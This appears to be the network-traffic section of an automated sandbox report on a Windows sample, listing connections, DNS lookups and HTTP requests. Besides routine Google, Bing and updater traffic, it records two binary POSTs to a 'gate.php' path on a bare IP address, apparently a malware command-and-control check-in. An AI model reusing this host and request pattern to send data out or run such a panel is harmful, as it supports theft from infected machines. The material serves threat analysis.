Network Analysis
Name | Response | Post-Analysis Lookup
---|---|---
r3---sn-3u-bh26.gvt1.com | CNAME r3.sn-3u-bh26.gvt1.com | 59.18.44.14
www.google.com | 172.217.25.100 |
- TCP Requests
  - 192.168.56.102:49808 -> 13.107.21.200:443
  - 192.168.56.102:49806 -> 142.250.199.68:443 (www.google.com)
  - 192.168.56.102:49797 -> 172.217.25.14:443
  - 192.168.56.102:49814 -> 172.217.25.3:443
  - 192.168.56.102:49813 -> 203.159.80.141:80
  - 192.168.56.102:49817 -> 203.159.80.141:80
  - 192.168.56.102:49815 -> 216.58.200.14:80
  - 192.168.56.102:49816 -> 59.18.44.14:80 (r3---sn-3u-bh26.gvt1.com)
- UDP Requests
  - 192.168.56.102:50839 -> 164.124.101.2:53
  - 192.168.56.102:54660 -> 164.124.101.2:53
  - 192.168.56.102:57660 -> 164.124.101.2:53
  - 192.168.56.102:61459 -> 164.124.101.2:53
  - 192.168.56.102:61998 -> 164.124.101.2:53
  - 192.168.56.102:137 -> 192.168.56.255:137
  - 192.168.56.102:138 -> 192.168.56.255:138
  - 192.168.56.102:49152 -> 239.255.255.250:3702
  - 192.168.56.102:56752 -> 239.255.255.250:1900
  - 192.168.56.102:56754 -> 239.255.255.250:3702
  - 192.168.56.102:56756 -> 239.255.255.250:3702
  - 192.168.56.102:61460 -> 239.255.255.250:3702

HTTP Requests
GET 200 https://www.google.com/
Request:
GET / HTTP/1.1
Host: www.google.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Thu, 01 Apr 2021 00:30:50 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2021-04-01-00; expires=Sat, 01-May-2021 00:30:50 GMT; path=/; domain=.google.com; Secure
Set-Cookie: NID=212=OEQC1LCfN9wEavngYMdW3jT1SfMfMq_QEEd1V9q_Z-Pm2xTy_2pHbPJRUJntZiPrm2sWKY4P_N7qnIWgCSGGnazYYQgn3cDYtD1d8A07ZM82WUWAkIpTvwu12Kyyyd1-eNfkFZd5FG41lem9YY6uPRTeuDjE8Somh6mtxYE5ZCo; expires=Fri, 01-Oct-2021 00:30:50 GMT; path=/; domain=.google.com; HttpOnly
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET 200 https://www.bing.com/
Request:
GET / HTTP/1.1
Host: www.bing.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Cache-Control: private
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Set-Cookie: MUID=3E86F2913265692F1977E29D33F66810; domain=.bing.com; expires=Tue, 26-Apr-2022 00:30:50 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=3E86F2913265692F1977E29D33F66810; expires=Tue, 26-Apr-2022 00:30:50 GMT; path=/
Set-Cookie: _EDGE_S=F=1&SID=176897864A2C669138DB878A4BBF670D; domain=.bing.com; path=/
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 26-Apr-2022 00:30:50 GMT; path=/
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/
Set-Cookie: SRCHUID=V=2&GUID=1E6BEE4E47E1441DAF1324C8BF0439A4&dmnchg=1; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/
Set-Cookie: SRCHUSR=DOB=20210401; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/
Set-Cookie: SRCHHPGUSR=SRCHLANGV2=ko; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/
Set-Cookie: _SS=SID=176897864A2C669138DB878A4BBF670D; domain=.bing.com; path=/
Set-Cookie: ULC=; domain=.bing.com; expires=Wed, 31-Mar-2021 00:30:50 GMT; path=/
Set-Cookie: _HPVN=CS=eyJQbiI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiUCJ9LCJTYyI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiSCJ9LCJReiI6eyJDbiI6MSwiU3QiOjAsIlFzIjowLCJQcm9kIjoiVCJ9LCJBcCI6dHJ1ZSwiTXV0ZSI6dHJ1ZSwiTGFkIjoiMjAyMS0wNC0wMVQwMDowMDowMFoiLCJJb3RkIjowLCJEZnQiOm51bGwsIk12cyI6MCwiRmx0IjowLCJJbXAiOjF9; domain=.bing.com; expires=Sat, 01-Apr-2023 00:30:50 GMT; path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-MSEdge-Ref: Ref A: D976900F8F464C9CB9C4090E7F36C5AE Ref B: SLAEDGE1020 Ref C: 2021-04-01T00:30:50Z
Date: Thu, 01 Apr 2021 00:30:50 GMT
POST 200 https://update.googleapis.com/service/update2?cup2key=10:1403012316&cup2hreq=66305915241c4634f51031e5bc7c5d4bdf4e8c4f63e65e37b4ec8569d469c62c
Request:
POST /service/update2?cup2key=10:1403012316&cup2hreq=66305915241c4634f51031e5bc7c5d4bdf4e8c4f63e65e37b4ec8569d469c62c HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Google Update/1.3.36.32;winhttp;cup-ecdsa
X-Old-UID: cnt=0
X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96}
X-Goog-Update-Updater: Omaha-1.3.36.32
X-Goog-Update-Interactivity: bg
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Content-Length: 1202
Host: update.googleapis.com
Response:
HTTP/1.1 200 OK
Content-Security-Policy: script-src 'report-sample' 'nonce-zu1/DT65NdLvgIX4NwTlnQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 01 Apr 2021 00:32:17 GMT
X-Cup-Server-Proof: 30460221008b7d740d314a86645ad2dd50c666e93accbea8034e925630bb99c5140184dce9022100cc1dc480376a6e5a0cbf6a7ae9382a3becfda1a2e4b9a25e1db4a1416406551c:66305915241c4634f51031e5bc7c5d4bdf4e8c4f63e65e37b4ec8569d469c62c
Content-Type: text/xml; charset=UTF-8
X-Daynum: 5203
X-Daystart: 63137
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST 0 http://203.159.80.141/LKJHGDS/gate.php (no response captured)
Request:
POST /LKJHGDS/gate.php HTTP/1.0
Host: 203.159.80.141
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 3712
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
HEAD 302 http://redirector.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
Request:
HEAD /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com
Response:
HTTP/1.1 302 Found
Date: Thu, 01 Apr 2021 00:32:20 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Location: http://r3---sn-3u-bh26.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes
Content-Type: text/html; charset=UTF-8
Server: ClientMapServer
Content-Length: 481
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
HEAD 200 http://r3---sn-3u-bh26.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes
Request:
HEAD /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-3u-bh26.gvt1.com
Response:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: public,max-age=86400
Content-Disposition: attachment
Content-Length: 1304160
Content-Security-Policy: default-src 'none'
Content-Type: application/octet-stream
Etag: "8346e1"
Server: downloads
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Date: Wed, 31 Mar 2021 04:59:43 GMT
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Last-Modified: Fri, 22 Jan 2021 06:31:14 GMT
Connection: keep-alive
Vary: Origin
POST 0 http://203.159.80.141/LKJHGDS/gate.php (no response captured)
Request:
POST /LKJHGDS/gate.php HTTP/1.0
Host: 203.159.80.141
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 3712
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
GET 206 http://r3---sn-3u-bh26.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes
Request:
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=175.208.134.150&mm=28&mn=sn-3u-bh26&ms=nvh&mt=1617236658&mv=m&mvi=3&pcm2cms=yes&pl=18&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=0-6881
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-3u-bh26.gvt1.com
Response:
HTTP/1.1 206 Partial Content
Accept-Ranges: bytes
Cache-Control: public,max-age=86400
Content-Disposition: attachment
Content-Length: 6882
Content-Security-Policy: default-src 'none'
Content-Type: application/octet-stream
Etag: "8346e1"
Server: downloads
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Date: Wed, 31 Mar 2021 04:59:43 GMT
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Last-Modified: Fri, 22 Jan 2021 06:31:14 GMT
Content-Range: bytes 0-6881/1304160
Connection: keep-alive
Vary: Origin
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts